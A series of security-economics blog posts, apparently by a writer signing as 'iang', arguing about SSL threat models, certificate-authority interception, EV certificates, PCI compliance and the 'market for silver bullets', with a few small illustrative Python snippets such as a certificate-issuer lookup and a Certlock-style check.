    Indeed. Note that comment about the World War II mindset. It is the case that the entire 1990s generation of security engineers were taught from the military text book. The military assumes its nodes -- its soldiers, its computers -- are safe. And, it so happens, that when armies fight armies, they do real-life active MITMs against each other to gain local advantage. There are cases of this happening, and oddly enough, they'll even do it to civilians if they think they can (ask Greenpeace). And the economics is sane, sensible stuff, if we bothered to think about it: in war, the wire is the threat, the nodes are safe.

    However, adopting "the wire" as the weakness and Mallory as the Man-In-The-Middle, and Eve as the Eavesdropper as "the threat" in the Internet was a mistake. Even in the early 1990s, we knew that the node was the problem. Firstly, ever since the PC, nodes in commercial computing are controlled by (dumb) users not professional (soldiers). Who download shit from the net, not operate trusted military assets. Secondly, observation of known threats told us where the problems lay: floppy viruses were very popular, and phone-line attacks were about spoofing and gaining entry to an end-point. Nobody was bothering with "the wire," nobody was talking about snooping and spying and listening [*].

    The military model was the precise reverse of the Internet's reality.

    To conclude. There is no doubt about this in security circles: the SSL threat model was all wrong, and consequently the product was deployed badly.

    Where the doubt lies is in how long it will take the software providers to realise that their world is upside down. It can probably only happen when everyone with credibility stands up and says it is so. For this, the posts shown here are very welcome. Let's hear more!


    [*] This is not entirely true. There is one celebrated case of an epidemic of eavesdropping over ethernets, which was passwords being exchanged over telnet and rsh connections. A case-study in appropriate use of security models follows...

    PS: Memes II - War! Infosec is WAR!

    Posted by iang at 04:33 PM | Comments (3) | TrackBack

    July 29, 2010

    The difference between 0 breaches and 0+delta breaches

    Seen on the net, by Dan Geer:

    The design goal for any security system is that the number of failures is small but non-zero, i.e., N>0. If the number of failures is zero, there is no way to disambiguate good luck from spending too much. Calibration requires differing outcomes.

    I've been trying for years to figure out a nice way to describe the difference between 0 failures, and some small number N>0 like 1 or 2 or 10 in a population of a million.

    Dan might have said it above: If the number of failures is zero, there is no way to disambiguate good luck from spending too much.

    Has he nailed it? It's certainly a lot tighter than my long efforts ... Once we get that key piece of information down, we can move on. As he does:

    Regulatory compliance, on the other hand, stipulates N==0 failures and is thus neither calibratable nor cost effective. Whether the cure is worse than the disease is an exercise for the reader.

    An insight! For regulatory compliance, I'd substitute public compliance, which includes all the media attention and reputation attacks.
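
    To see Dan's point in toy terms, here is a minimal Poisson sketch (Python; the rates are invented for illustration) of why a zero-failure year carries almost no information:

        import math

        def p_zero(rate):
            """Chance of observing zero failures in a year when the
            true failure rate (expected count) is `rate`.
            Poisson: P(N=0) = e^-rate."""
            return math.exp(-rate)

        for rate in (0.01, 0.1, 0.5, 1.0):
            print(f"true rate {rate}: P(zero observed) = {p_zero(rate):.2f}")

        # Prints 0.99, 0.90, 0.61, 0.37: wildly different security
        # postures, all quite likely to produce a clean year. Observe
        # N=3, though, and the maximum-likelihood estimate of the rate
        # is simply 3: now you can calibrate.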

    Posted by iang at 12:29 AM | Comments (6) | TrackBack

    May 28, 2010

    questioning infosec -- don't buy into professionalism, certifications, and other silver bullets

    Gunnar posts on the continuing sad saga of infosec:

    There's been a lot of threads recently about infosec certification, education and training. I believe in training for infosec, I have trained several thousand people myself. Greater knowledge, professionalism and skills definitely help, but are not enough by themselves.

    We saw in the case of the Great Recession and in Enron where the skilled, certified accounting and rating professions totally sold out and blessed bogus accounting practices and non-existent earnings.

    Right. And this is an area where the predictions of economics are spot on. In Akerlof's seminal paper "The Market for Lemons," he predicts that the asymmetry of information can be helped by institutions. In the economics sense, institutions are non-trading, non-2-party, long-standing market contractual arrangements that get stuff happening. Professionalism, training, certifications, etc., are all slap-bang in the middle of those recommendations.

    So why don't they help? There's a simple answer: we aren't in the market for lemons! There's one key flaw: Lemons postulates that the seller knows and the buyer doesn't, and that simply doesn't apply to infosec (criterion #1). In the market for security, the seller knows about his tool, but he doesn't know whether it is fit for the buyer. In contrast, the salesman in Akerlof's market assumed correctly that a car was good for the buyer, so the problem really was sharing the secret information from the seller to the buyer. Used-car warranties did that, by forcing the seller to reveal his real pricing.

    The buyer doesn't really know what he wants, and the seller has no better clue. Indeed, it may be that the buyer has more of a clue, at least sometimes. So professionalism, certification, training and warranties aren't going to be the answer.

    Another way of looking at this is that in infosec, in common with all security markets (think defence, crime) there is a third party: the attacker. This is the party that really knows, so knowledge-based solutions without clear incorporation of the aggressor's knowledge aren't going to work. This is why buying the next generation stealth fighter is not really helpful when your attacker is a freedom fighter in an Asian hell-hole with an IED. But it's a lot more exciting to talk about.

    Which leads me to one controversial claim. If we can't get useful information from the seller, then the answer is, you've got to find it by yourself. It's your job, do it. And that's really what we mean by professionalism -- knowing when you can outsource something, and knowing when you can't.

    That's controversial because legions of infosec product suppliers will think they're out of a job, but that's not quite true. It just requires a shift in thinking, and a willingness to think about the buyer's welfare, not just his wallet. How do we improve the ability of the client to do their job? Which leads right back to education: it is possible to teach better security practices. It's also possible to teach better risk practices. And, it can be done on an organisation-wide basis. Indeed, this is one of the processes that Microsoft took in trying to escape their security nightmare: get rid of the security architecture silos and turn the security groups into education groups [1].

    So, from this claim, why the flip into a conundrum: why aren't certifications the answer? It's because certifications /are an institution/ and institutions are captured by one party or another. Usually, the sellers. Again, a well-known prediction from economics: institutions created to protect the buyer are generally captured by the seller in time (if not at creation). I think this was Stigler's capture theory, pointing to finance market regulation, again.

    A supplier of certifications needs friends in industry, which means they need to also sell the product of industry. It's hard to make friends selling contrarian advice; it is far more profitable selling middle-of-the-road advice about your partners [2]. "Let's start with SSL + firewalls ..." Nobody's going to say boo, just pass go, just collect the fees. In contrast:

    In short, the biggest problem in infosec is integration. Education around security engineering for integration would be most welcome.

    That's tough, from an institutional point of view.



    [1] Of course, even for Microsoft, bettering their internal capabilities was no silver bullet. They did get better, and their latest products are now viewed as more secure. FWIW. But they still lost pole position last week, as Apple pipped Microsoft to become the world's biggest tech organisation by market cap. Security played its part in that, and it remains a stellar prediction that it is still better /for your security/ to work with a Mac, because apparent Mac market shares are still low enough to earn a monoculture bounty for Apple users. Microsoft, keep trying, some are noticing, but no cigar as yet :)

    [2] E.g., I came across a certification and professional code of conduct that required you to sign up as promoting /best practices/. Yet best practices are the lowest common denominator; they are the set of uncontroversial products. We're automatically on the back foot, because we're encouraging an organisation to lower its own standards to best practices, comply with whatever list someone finds off the net, and stop right there. Hopeless!

    Posted by iang at 10:16 PM | Comments (1) | TrackBack

    April 13, 2010

    Ruminations on the State of the Security Nation

    In an influential paper, Prof Ross Anderson proposes that the _Market for Lemons_ is a good fit for infosec. I disagree, because that market is predicated on the seller being informed, and the buyer not. I suggest the sellers are equally ill-informed, leading to the Market for Silver Bullets.

    Microsoft and RSA have just published some commissioned research by Forrester that provides some information, but it doesn't help to separate the positions:

    CISOs do not know how effective their security controls actually are. Regardless of information asset value, spending, or number of incidents observed, nearly every company rated its security controls to be equally effective — even though the number and cost of incidents varied widely. Even enterprises with a high number of incidents are still likely to imagine that their programs are “very effective.” We concluded that most enterprises do not actually know whether their data security programs work or not.

    Buyers remain uninformed, something we both agree on. Curiously, it isn't an entirely good match for Akerlof, as the buyer of a Lemon is uninformed before, and regrettably over-informed afterwards. No such luck for the CISO.

    Which leaves me with an empirical problem: how to show that the sellers are uninformed? I provide some anecdotes in that paper, but we would need more to settle the prediction.

    It should be possible to design an experiment to reveal this. For example, drawing on the above logic, if a researcher were to ask similar questions of both the buyer and the seller, and could show a lack of correlation between the suppliers' claims and the incident rate, that would say something.
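
    As a sketch of that experiment (Python; the data is entirely made up for illustration):

        # Each pair is one product: the seller's claimed effectiveness
        # (1-5) and the buyer's incident count over a year using it.
        claims    = [5, 4, 5, 3, 5, 4, 2, 5]
        incidents = [7, 2, 9, 3, 1, 8, 2, 6]

        def pearson(xs, ys):
            n = len(xs)
            mx, my = sum(xs) / n, sum(ys) / n
            cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
            vx = sum((x - mx) ** 2 for x in xs)
            vy = sum((y - my) ** 2 for y in ys)
            return cov / (vx * vy) ** 0.5

        print(f"claims v. incidents: r = {pearson(claims, incidents):+.2f}")
        # A correlation near zero would suggest the sellers' claims carry
        # no information about outcomes: i.e., the sellers don't know either.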

    The immediate problem of course is, who would do this? Microsoft and RSA aren't going to, as they are sell-side, and their research was obviously focussed on their needs. Which means, it might be entirely accurate, but might not be entirely complete; they aren't likely to want to clearly measure their own performance.

    And, if there is one issue that is extremely prevalent in the world of information security, it is the lack of powerful and independent buy-side institutions who might be tempted to do independent research on the information base of the sellers.

    Oh well. Moving on to the other conclusions:

    • Secrets comprise two-thirds of the value of firms’ information portfolios.
    • Compliance, not security, drives security budgets.
    • Firms focus on preventing accidents, but theft is where the money is.
    • The more valuable a firm’s information, the more incidents it will have.

    The second and third were also predicted in that paper.

    The last is hopefully common sense, but unfortunately as someone used to say, common sense isn't so common. Which brings me to Matt Blaze's rather good analysis of the threats to the net in 1995, as an afterword to Applied Cryptography, the seminal red book by Bruce Schneier:

    One of the most dangerous aspects of cryptology (and, by extension, of this book), is that you can almost measure it. Knowledge of key lengths, factoring methods, and cryptanalytic techniques make it possible to estimate (in the absence of a real theory of cipher design) the "work factor" required to break a particular cipher. It's all too tempting to misuse these estimates as if they were overall security metrics for the systems in which they are used. The real world offers the attacker a richer menu of options than mere cryptanalysis; often more worrisome are protocol attacks, Trojan horses, viruses, electromagnetic monitoring, physical compromise, blackmail and intimidation of key holders, operating system bugs, application program bugs, hardware bugs, user errors, physical eavesdropping, social engineering, and dumpster diving, to name just a few.

    Right. It can hardly have escaped anyone by now that the influence of cryptography has been huge, but its success in security has been minimal. Cryptography has not really been shown to secure our interactions that much, having missed the target as many times as it might have hit it. And with the rise of phishing and breaches and MITBs and trojans and so forth, we are now in the presence of evidence that the institutions of strong cryptography have cemented us into a sort of Maginot line mentality. So it may be doing more harm than good, although such a claim would need a lot of research to give it some weight.

    I tried to research this a little in Pareto-secure, in which I asked why the measurements of crypto-algorithms received such slavish attention, to the exclusion of so much else. I found an answer, at least, and it was a positive, helpful answer. But the far bigger question remains: what about all the things we can't measure with a bit-ruler?
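
    For the record, here is what the bit-ruler can measure, in a toy calculation (Python; the attacker's budget of 2^40 trial decryptions per second is an invented, generous figure):

        SECONDS_PER_YEAR = 60 * 60 * 24 * 365

        def years_to_search(key_bits, trials_per_second=2**40):
            """Expected years to brute-force a key: half the keyspace."""
            return 2 ** (key_bits - 1) / trials_per_second / SECONDS_PER_YEAR

        for bits in (56, 80, 128):
            print(f"{bits}-bit key: ~{years_to_search(bits):.3g} years on average")

        # 56-bit: hours (hence DES's demise); 80-bit: ~1.7e4 years;
        # 128-bit: ~5e18 years. All crisply measurable, and all silent
        # on trojans, users, dumpster diving and the rest of Blaze's menu.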

    Matt Blaze listed 10 things in 1996:

    1. The sorry state of software.
    2. Ineffective protection against denial-of-service attacks.
    3. No place to store secrets.
    4. Poor random number generation.
    5. Weak passphrases.
    6. Mismatched trust.
    7. Poorly understood protocol and service interactions.
    8. Unrealistic threat and risks assessment.
    9. Interfaces that make security expensive and special.
    10. No broad-based demand for security.

    In 2010, today more or less, he said "not much has changed." We live in a world where if MD5 is shown to be a bit flaky because it has fewer bits than SHA1, the vigilantes of the net launch pogroms on the poor thing, committees of bitreaucrats write up how MD5-must-die, and the media breathlessly runs around claiming the sky will fall in. Even though none of this is true, and there is no attack possible at the moment; and when the attack is possible, it is still so unlikely that we can ignore it ... and even if it does happen, the damages will be next to zero.

    Meanwhile, if you ask for a user-interface change, because the failure of the user-interface to identify false end-points has directly led to billions of dollars of damages, you can pretty much forget any discussion. For some reason, bit-strength dominates dollars-losses, in every conversation.

    I used to be one of those who gnashed my teeth at the sheer success of Applied Cryptography, and the consequent generation of crypto-amateurs who believed that the bit count was the beginning and end of all. But that's unfair, as I never got as far as reading the afterword, and the message is there. It looks like Bruce made a slight error, and should have made Matt Blaze's contribution the foreword, not the afterword.

    A one-word error in the editorial algorithm! I must write to the committee...

    Afterword: rumour has it that the 3rd edition of Applied Cryptography is nearing publication.

    Posted by iang at 02:25 AM | Comments (1) | TrackBack

    March 29, 2010

    Pushing the CA into taking responsibility for the MITM

    This ArsTechnica article explores what happens when the CA-supplied certificate is used as an MITM over some SSL connection to protect online-banking or similar. In the secure-lite model that emerged after the real-estate wars of the mid-1990s, consumers were told to click on their tiny padlock to check the cert:

    Now, a careful observer might be able to detect this. Amazon's certificate, for example, should be issued by VeriSign. If it suddenly changed to be signed by Etisalat (the UAE's national phone company), this could be noticed by someone clicking the padlock to view the detailed certificate information. But few people do this in practice, and even fewer people know who should be issuing the certificates for a given organization.
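
    As an aside, the padlock-click the quote describes amounts to only a few lines of code. A sketch using Python's standard ssl module (the hostname is merely illustrative):

        import socket, ssl

        def issuer_of(host, port=443):
            """Fetch a site's certificate and return its issuer fields:
            the programmatic equivalent of clicking the padlock."""
            ctx = ssl.create_default_context()
            with socket.create_connection((host, port)) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    cert = tls.getpeercert()
            # issuer is a tuple of RDN tuples, e.g. ((('organizationName', ...),), ...)
            return dict(pair[0] for pair in cert['issuer'])

        print(issuer_of('www.amazon.com').get('organizationName'))

    Few users will ever do even that much, and fewer still know which issuer they *should* be seeing.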

    Right, so where does this go? Well, people don't notice because they can't. Put the CA on the chrome and people will notice. What then?

    A switch in CA is a very significant event. Jane Public might not be able to do anything, but if a customer of Verisign's was MITM'd by a cert from Etisalat, this is something that affects Verisign. We might reasonably expect Verisign to be interested in that. As it affects the chrome, and as customers might get annoyed, we might even expect Verisign to treat this as an attack on its good reputation.

    And that's why putting the brand of the CA onto the chrome is so important: it's the only real way to bring pressure to bear on a CA to get it to lift its game. Security, reputation, sales. These things are all on the line when there is a handle to grasp by the public.

    When the public has no handle on what is going on, the deal falls back into the shadows. No security there; in the shadows we find audit, contracts, outsourcing. Got a problem? Shrug. It doesn't affect our sales.

    So, what happens when a CA MITM's its own customer?

    Even this is limited; if VeriSign issued the original certificate as well as the compelled certificate, no one would be any the wiser. The researchers have devised a Firefox plug-in that should be released shortly that will attempt to detect particularly unusual situations (such as a US-based company with a China-issued certificate), but this is far from sufficient.

    Arguably, this is not an MITM, because the CA is the authority (not the subscriber) ... but exotic legal arguments aside, we clearly don't want it. When it goes on, what we need is software like whitelisting, like Conspiracy, and like the other ideas floating around, to detect it.

    And, we need the CA-on-the-chrome idea so that the responsibility aspect is established. CAs shouldn't be able to MITM other CAs. If we can establish that, with teeth, then the CA-against-itself case is far easier to deal with.

    Posted by iang at 11:20 PM | Comments (7) | TrackBack

    March 24, 2010

    Why the browsers must change their old SSL security (?) model

    In a paper, _Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL_, by Christopher Soghoian and Sid Stamm, there is a reasonably good layout of the problem that browsers face in delivering their "one-model-suits-all" security model. It is more or less what we've understood all these years: by accepting an entire root list of 100s of CAs, there is no barrier to any one of them going a little rogue.

    Of course, it is easy to raise the hypothetical of the rogue CA, and even to show compelling evidence of business models (they cover much the same claims about a CA that also works in the lawful intercept business, which was covered here on FC many years ago). Beyond theoretical or probable evidence, it seems the authors have stumbled on some evidence that it is happening:

    The company’s CEO, Victor Oppelman confirmed, in a conversation with the author at the company’s booth, the claims made in their marketing materials: That government customers have compelled CAs into issuing certificates for use in surveillance operations. While Mr Oppelman would not reveal which governments have purchased the 5-series device, he did confirm that it has been sold both domestically and to foreign customers.

    (my emphasis.) This has been a lurking problem underlying all CAs since the beginning. The flip side of the trusted-third-party concept ("TTP") is the centralised-vulnerability-party or "CVP". That is, you may have been told you "trust" your TTP, but in reality, you are totally vulnerable to it. E.g., from the famous Blackberry "official spyware" case:

    Nevertheless, hundreds of millions of people around the world, most of whom have never heard of Etisalat, unknowingly depend upon a company that has intentionally delivered spyware to its own paying customers, to protect their own communications security.

    Which becomes worse when the browsers insist, not without good reason, that the root list is hidden from the consumer. The problem that occurs here is that the compelled CA problem multiplies to the square of the number of roots: if a CA in (say) Ecuador is compelled to deliver a rogue cert, then that can be used against a CA in Korea, and indeed all the other CAs. A brief examination of the ways in which CAs work, and browsers interact with CAs, leads one to the unfortunate conclusion that nobody in the CAs, and nobody in the browsers, can do a darn thing about it.

    So it then falls to a question of statistics: at what point do we believe that there are so many CAs in there that the chance of getting away with a little interception is too enticing? Square law says the combinations are, say, 100 CAs squared, or 10,000 times the exposure of any one intercept; which is to say the temptation is resisted in all except 0.01% of circumstances. OK, pretty scratchy maths, but it does indicate that the temptation is a small but not infinitesimal number. A risk exists, in words, and in numbers.
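
    To firm the scratchy maths up a touch, one possible formalisation (Python; the per-CA compromise probability is invented for illustration):

        # Any of N roots can issue for any site, so the defence is only
        # as strong as the weakest root. Assume each CA independently
        # has probability p of being compelled or rogue in a year.
        def p_some_rogue(n_cas, p=0.001):
            return 1 - (1 - p) ** n_cas

        for n in (1, 10, 100):
            print(f"{n:3} CAs: P(a rogue cert is available) = {p_some_rogue(n):.3f}")

        # 1 CA: 0.001; 100 CAs: ~0.095. The exposure grows with N, while
        # the pairings of victim-CA and rogue-CA grow as N squared: that
        # squared crowd is what a compelled CA hides in.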

    One CA can hide amongst the crowd, but there is a little bit of a fix to open up that crowd. This fix is to simply show the user the CA brand, to put faces on the crowd. Think of the above, and while it doesn't solve the underlying weakness of the CVP, it does mean that the mathematics of squared vulnerability collapses. Once a user sees their CA has changed, or has a chance of seeing it, hiding amongst the crowd of CAs is no longer as easy.

    Why then do browsers resist this fix? There is one good reason, which is that consumers really don't care and don't want to care. In more particular terms, they do not want to be bothered by security models, and the security displays in the past have never worked out. Gerv puts it this way in comments:

    Security UI comes at a cost - a cost in complexity of UI and of message, and in potential user confusion. We should only present users with UI which enables them to make meaningful decisions based on information they have.

    They love Skype, which gives them everything they need without asking them anything. That should be motive enough to follow those lessons, but the context is different. Skype is in the chat & voice market, and the security model it has chosen is well in excess of needs there. Browsing, on the other hand, is in the credit-card shopping and Internet online banking market, and the security model imposed by the mid-1990s evolution of uncontrollable forces has now broken before the onslaught of phishing & friends.

    In other words, for browsing, the writing is on the wall. Why then don't they move? In a perceptive footnote, the authors also ponder this conundrum:

    3. The browser vendors wield considerable theoretical power over each CA. Any CA no longer trusted by the major browsers will have an impossible time attracting or retaining clients, as visitors to those clients’ websites will be greeted by a scary browser warning each time they attempt to establish a secure connection. Nevertheless, the browser vendors appear loathe to actually drop CAs that engage in inappropriate behavior — a rather lengthy list of bad CA practices that have not resulted in the CAs being dropped by one browser vendor can be seen in [6].

    I have observed this for a long time now, predicting phishing until it became the flood of fraud. The answer is, to my mind, a complicated one which I can only paraphrase.

    For Mozilla, the reason is a simple lack of security capability at the *architectural* and *governance* levels. Indeed, it should be noticed that this lack of capability is their policy, as they deliberately and explicitly outsource big security questions to others (known as the "standards groups", such as IETF's RFC committees). As they have little of the capability, they aren't in a good position to use the power, whether they would want to or not. So it only needs a mildly argumentative approach on behalf of the others, and Mozilla is restrained from using its apparent power.

    What then of Microsoft? Well, they certainly have the capability, but they have other fish to fry. They aren't fussed about the power because it doesn't bring them anything of use. As a corporation, they are strictly interested in shareholders' profits (by law and by custom), and as nobody can show them a bottom-line improvement from the CA & cert business, no interest is generated. And without that interest, it is practically impossible to get the many various groups within Microsoft to move.

    Unlike Mozilla, my view of Microsoft is much more "external", based on many observations that have never been confirmed internally. However it seems to fit; all of their security work has been directed to market interests. Hence for example their work in identity & authentication (.net, infocard, etc) was all directed at creating the platform for capturing the future market.

    What is odd is that all CAs agree that they want their logo on the browser's real estate. Big and small. So one would think that there was a unified approach to this, and it would eventually win the day; the browser wins for advancing security, the CAs win because their brand investments now make sense. The consumer wins for both reasons. Indeed, early recommendations from the CABForum, a closed group of CAs and browsers, had these fixes in there.

    But these ideas keep running up against resistance, and none of the resistance makes any sense. And that is probably the best way to think of it: the browsers don't have a logical model for where to go for security, so anything leaps the bar when the level is set to zero.

    Which all leads to a new group of people trying to solve the problem. The authors present their model as this:

    The Firefox browser already retains history data for all visited websites. We have simply modified the browser to cause it to retain slightly more information. Thus, for each new SSL protected website that the user visits, a Certlock enabled browser also caches the following additional certificate information:
    A hash of the certificate.
    The country of the issuing CA.
    The name of the CA.
    The country of the website.
    The name of the website.
    The entire chain of trust up to the root CA.

    When a user re-visits a SSL protected website, Certlock first calculates the hash of the site’s certificate and compares it to the stored hash from previous visits. If it hasn’t changed, the page is loaded without warning. If the certificate has changed, the CAs that issued the old and new certificates are compared. If the CAs are the same, or from the same country, the page is loaded without any warning. If, on the other hand, the CAs’ countries differ, then the user will see a warning (See Figure 3).
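
    In code terms, the quoted logic is roughly this (a Python paraphrase; the real Certlock is a Firefox extension, and the names here are mine):

        cache = {}   # hostname -> (cert_hash, ca_name, ca_country)

        def certlock_check(host, cert_hash, ca_name, ca_country):
            seen = cache.get(host)
            cache[host] = (cert_hash, ca_name, ca_country)
            if seen is None:
                return "first visit: remember and load"
            old_hash, old_ca, old_country = seen
            if cert_hash == old_hash:
                return "same certificate: load without warning"
            if ca_name == old_ca or ca_country == old_country:
                return "new cert, same CA or country: load without warning"
            return "WARN: certificate now issued from a different country"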

    This isn't new. The authors credit recent work, but no further back than a year or two. Which I find sad because the important work done by TrustBar and Petnames is pretty much forgotten.

    But it is encouraging that the security models are battling it out, because it gets people thinking, and challenging their assumptions. Only actually-shipped code, and garnered market share, are likely to change the security outcomes for users. So while we can criticise the country approach (it assumes a sort of magical touch of law within the countries concerned that is already assumed not to exist, by dint of us being here in the first place), the country "proxy" is much better than nothing, and it gets us closer to the real information: the CA.

    From a market for security pov, it is an interesting period. The first attempts around 2004-2006 in this area failed. This time, the resurgence seems to have a little more steam, and possibly now is a better time. In 2004-2006 the threat was seen as more or less theoretical by the hoi polloi. Now however we've got governments interested, consumers sick of it, and the entire military-industrial complex obsessed with it (both in participating and fighting). So perhaps the newcomers can ride this wave of FUD in, where previous attempts drowned far from the shore.

    Posted by iang at 07:52 PM | Comments (1) | TrackBack

    February 10, 2010

    EV's green cert is breached (of course) (SNAFU)

    Reading up on something or other (Ivan Ristić), I stumbled on this EV breach by Adrian Dimcev:

    Say you go to https://addons.mozilla.org and download a popular extension. Maybe NoScript. The download location appears to be over HTTPS. ... (lots of HTTP/HTTPS blah blah) ... Today I had some time, so I’ve decided to play a little with this. ...

    Well, Wladimir Palant is now the author of NoScript, and of course, I’m downloading it over HTTPS.

    Boom! Mozilla's website uses an EV ("extended validation") certificate to present to the user that this is a high security site, or something. However, it provided the downloads over HTTP, and this was easily manipulable. Hence, NoScript (which I use) was hit by an MITM, and this might explain why Robert Hansen said that the real author of NoScript, Giorgio Maone, was the 9th most dangerous person on the planet.

    What's going on here? Well, several things. The promise that the web site makes when it displays the green EV certificate is just that: a promise. The essence of the EV promise is that it is somehow of a stronger quality than, say, raw unencrypted HTTP.

    EV checks identity to the Nth degree, which is why it is called "extended validation." Checking identity is useful, but only insofar as it is matched by a balance in the overall security, so the difference between ordinary certs and EV is mostly irrelevant. In simple security-model terms, that's not where the threats are (or ever were), so they are winding up the wrong knob. In economics terms, EV raises the cost barrier, which is classical price discrimination, and this results in a colourful signal, not a metric or measure. The marketing aligns the green signal with security, but the attack easily splits security from promise. Worse, the more they wind the knob, the more they drift off topic, as per the silver bullets hypothesis.

    If you want to put it in financial or payments context, EV should be like PCI, not like KYC.

    But it isn't, it's the gold-card of KYC. So, how easy is it to breach the site itself and render the promise a joke? Well, this is the annoying part. Security practices in the HTTP world today are so woeful that even if you know a lot, and even if you try hard to make it secure, the current practices are terrifically hard to secure. Basically, complexity is the enemy of security, and complexity is too high in the world of websites & browsers.

    So CABForum, the promoters of EV, fell into the trap of tightening the identity knob up so much, to increase the promise of security ... but didn't look at all at the real security equation on which it is dependent. So, it is a strong brand over a weak product, it's green paint over wood rot. Worse for them, they won't ever rectify this, because the solutions are out of their reach: they cannot weaken the identity promise without causing the bureaucrats to attack them, and they cannot improve the security of the foundation without destroying the business model.

    Which brings us to the real security question. What's the easiest fix? It is:

    there is only one mode, and it is secure.

    Now, hypothetically, we could see a possibility of saving EV if the CABForum contracts were adjusted such that they enforce this dictum. In practical measures, it would be a restriction that an EV-protected website could only communicate over EV; there would be no downgrade possible. Not to blue HTTPS, not to white HTTP. This would include all downloads, all javascript, all mashups, all off-site blah blah.
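
    The dictum is even crudely checkable. A toy scan for downgrade paths on an EV page (Python; a real check would parse the HTML and javascript properly, and follow redirects):

        import re
        import urllib.request

        def insecure_references(url):
            """List plain-http URLs referenced from an https page."""
            html = urllib.request.urlopen(url).read().decode("utf-8", "replace")
            return sorted(set(re.findall(r'http://[^\s"\'<>]+', html)))

        for ref in insecure_references("https://addons.mozilla.org"):
            print("downgrade path:", ref)

    Any hit is a place where the green promise silently falls back to white HTTP, which is exactly the hole in the NoScript episode.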

    And that would be the first problem with securing the promise: EV is sold as a simple identity advertisement, it does not enter into the security business at all. So this would make a radical change in the sales process, and it's not clear it would survive the transition.

    Secondly, CABForum is a cartel of people who are in the sales business. It's not security-wise but security-talk. So as a practical matter, the institution is not staffed with the people who are going to pick up this ball and run with it. It has a history of missing the target and claiming victory (cf. phishing), so what would change its path now?

    That's not to say that EV is all bad, but here is an example of how CABForum succeeded and failed, as illustrative of their difficulties:

    EV achieved one thing, in that it put the brand name of the CA on the agenda. HTTPS security at the identity level is worthless unless the brand of the CA is shown. I haven't seen a Microsoft browser in a while, but the mock-ups showed the brand of the CA, so this gives the consumer a chance to avoid the obvious switcheroo from known brand to strange foreign thing, and recent breaches of various low-end commercial CAs indicate there isn't much consistency across the brands. (Or fake injection attacks, if one is worried about MITB.)

    So it is essential to any sense of security that the identity of who made the security statement be known to consumers; and CABForum tried to make this happen. Here's one well-known (branded) CA's display of the complete security statement.

    But Mozilla was a hold-out. (It is a mystery why Mozilla fights against the complete security statement. I have a feeling it is more of the same problem that infects CABForum, Microsoft and the Internet in general: monoculture. Mozilla is staffed by developers who apparently think that brands are TV-adverts or road-side billboards of no value to their users, and that Mozilla's mission is to protect their flock against another mass-media rape of consciousness & humanity by the evil globalised corporations ... rather than appreciating brands as handles to security statements that mesh into an overall security model.)

    Which puts the example to the test: although CABForum was capable of winding the identity knob up to 11, and beyond, they were not capable of adjusting the guidelines to change the security model and force the brand of the CA to be shown on the browser, in some sense. In these terms, what has now happened is that Mozilla is embarrassed, but zero fallout lands on the CA. It was the CA that should have solved the problem in the first place, because the CA is in the sell-security business, Mozilla is not. So the CA should have adjusted contracts to control the environment in which the green could be displayed. Oops.

    Where do we go from here? Well, we'll probably see a lot of embarrassing attacks on EV ... the brand of EV will wobble, but still sell (mostly because consumers don't believe it anyway, because they know all security marketing is mostly talk [or, do they?], and corporates will try any advertising strategy, because most of them are unprovable anyway). But, gradually the embarrassments will add up to sufficient pressure to push the CABForum to entering the security business. (e.g., PCI not KYC.)

    The big question is, how long will this take, and will it actually do any good? If it takes 5-10 years, which I would predict, it will likely be overtaken by events, just as happened with the first round of security world versus phishing. It seems that we are in that old military story where our unfortunate user-soldiers are being shot up on the beaches while the last-war generals are still arguing as to what paint to put on the rusty ships. SNAFU, "situation normal, all futzed up," or in normal language, same as it ever was.

    Posted by iang at 12:23 PM | Comments (7) | TrackBack

    January 23, 2010

    load up on Steel, and shoot it out! PCI and the market for silver bullets

    Unusually, someone in the press wrote up a real controversy, called The Great PCI Security Debate of 2010. Exciting stuff! In this case, a bunch of security people including Bill Brenner, Ben Rothke, Anton Chuvakin and other famous names are arguing whether PCI is good or bad. The short story is that we are in the market for silver bullets, and this article nicely lays out the evidence:

    Let's just look at the security market: I did a market survey when I was at IBM and there were about 70 different security product technologies, not even counting services. How many of those are required by PCI? It's a tiny subset. No one invests in all 70.

    In this market, external factors are the driving force:

    But the truth is, when someone determined they had to do something about targeted attacks or data loss prevention for intellectual property, they had a pilot and a budget but their bosses told them to cut it. The reason was, "I might get hacked, but I will get fined." That's a direct quote from a CIO and it's very logical and business focused. But instead of securing their highest-risk priority they're doing the thing that they'll get fined for not doing.

    We don't "do security"; rather, we avoid exposure to fingerpointing and other embarrassments. By way of the hypotheses in the market for silver bullets, we then find ourselves seeking to reduce the exposure to those external costs; this causes the evolution of some form of best practices, an agreed set that simply ensures you are not isolated by difference. In the case in point, that best practices is PCI.

    In other words, security by herding, compliance-seeking behaviour:

    One of the things I see within organizations is that there's a hurry-up-and-wait mentality. An organization will push really hard to get compliant. Then, the day the auditor walks out the door they say, "Thank goodness. Now I can wait until next year." So when we talk about compliance driving the wrong mindset, I think the wrong mindset was there to begin with.

    It's a difficult proposition to say we're doing compliance instead of security when what I see is they're doing compliance because someone told them to, whereas if no one told them to they'd do nothing. It's like telling your kids to do their homework. If you don't tell them to do the homework they're going to play outside all day.

    This is rational: we simply save more money doing that. What to do about it? If one is a consultant, one can sell more services:

    There is security outside of PCI and if we as security counselors aren't encouraging customers to look outside PCI then we ourselves are failing the industry because we're not encouraging them to look to good security as opposed to just good PCI compliance. The idea that they fear the auditor and not the attacker really bothers me.

    Which is of course rational for the adviser, but not rational for the buyer because more security likely reduces profits in this market. If on the other hand we are trying to make the market more efficient (generally a good goal, as this means it reduces the costs to all players) then the goal is simple: move the market for silver bullets into a market for lemons or limes.

    That's easy to say, very hard to do. There's at least one guy who doesn't want that to happen: the attacker. Furthermore, depending on your view of the perversion of incentives in the payment industry, fraud is good for profits because it enables building of margin. Our security adviser has the same perverse incentive: the more fraud, the more jobs. Indeed, everyone is positive about it, except the user, and they get the bill, not the vote.

    I see a bright future for PCI. To put it in literary terms:

    Ben Rothke: Dan Geer is the Shakespeare of information security, but at the end of the day people are reading Danielle Steel, not Shakespeare.

    In the market for silver bullets, you don't need to talk like Shakespeare. Load up on bullets of Steel, or as many other mangled metaphors as you can cram in, and you're good to shoot it out with the rest of 'em.

    Posted by iang at 08:23 AM | Comments (0) | TrackBack

    December 05, 2009

    Phishing numbers

    From a couple of sources posted by Lynn:

    • A single run only hits 0.0005 percent of users.
    • 1% of customers will follow the phishing links.
